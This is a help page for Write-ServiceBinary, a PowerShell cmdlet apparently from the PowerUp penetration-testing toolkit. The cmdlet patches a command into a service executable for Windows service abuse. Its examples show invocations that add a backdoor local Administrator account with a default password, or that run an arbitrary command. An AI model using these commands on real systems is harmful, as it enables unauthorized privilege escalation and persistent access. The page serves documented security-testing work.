blob: 7d588a54683c2d43104096bf8bc2f00105192d1f (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
|
# Write-ServiceBinary
## SYNOPSIS
Patches in the specified command to a pre-compiled C# service executable and
writes the binary out to the specified ServicePath location.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
## SYNTAX
```
Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
[-Credential <PSCredential>] [-Command <String>] [-Path <String>]
```
## DESCRIPTION
Takes a pre-compiled C# service binary and patches in the appropriate commands needed
for service abuse.
If a -UserName/-Password or -Credential is specified, the command
patched in creates a local user and adds them to the specified -LocalGroup, otherwise
the specified -Command is patched in.
The binary is then written out to the specified
-ServicePath.
Either -Name must be specified for the service, or a proper object from
Get-Service must be passed on the pipeline in order to patch in the appropriate service
name the binary will be running under.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Write-ServiceBinary -Name VulnSVC
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
### -------------------------- EXAMPLE 2 --------------------------
```
Get-Service VulnSVC | Write-ServiceBinary
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
### -------------------------- EXAMPLE 3 --------------------------
```
Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
```
Writes a service binary to service.exe in the local directory for VulnSVC that adds
TESTLAB\john to the Administrators local group.
### -------------------------- EXAMPLE 4 --------------------------
```
Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (backdoor/Password123!).
### -------------------------- EXAMPLE 5 --------------------------
```
Write-ServiceBinary -Name VulnSVC -Command "net ..."
```
Writes a service binary to service.exe in the local directory for VulnSVC that
executes a custom command.
## PARAMETERS
### -Name
The service name the EXE will be running under.
```yaml
Type: String
Parameter Sets: (All)
Aliases: ServiceName
Required: True
Position: 1
Default value: None
Accept pipeline input: True (ByPropertyName, ByValue)
Accept wildcard characters: False
```
### -UserName
The \[domain\\\]username to add.
If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: John
Accept pipeline input: False
Accept wildcard characters: False
```
### -Password
The password to set for the added user.
If not given, it defaults to "Password123!"
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: Password123!
Accept pipeline input: False
Accept wildcard characters: False
```
### -LocalGroup
Local group name to add the user to (default of 'Administrators').
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: Administrators
Accept pipeline input: False
Accept wildcard characters: False
```
### -Credential
A \[Management.Automation.PSCredential\] object specifying the user/password to add.
```yaml
Type: PSCredential
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: [Management.Automation.PSCredential]::Empty
Accept pipeline input: False
Accept wildcard characters: False
```
### -Command
Custom command to execute instead of user creation.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Path
Path to write the binary out to, defaults to 'service.exe' in the local directory.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: "$(Convert-Path .)\service.exe"
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
### PowerUp.ServiceBinary
## NOTES
## RELATED LINKS
|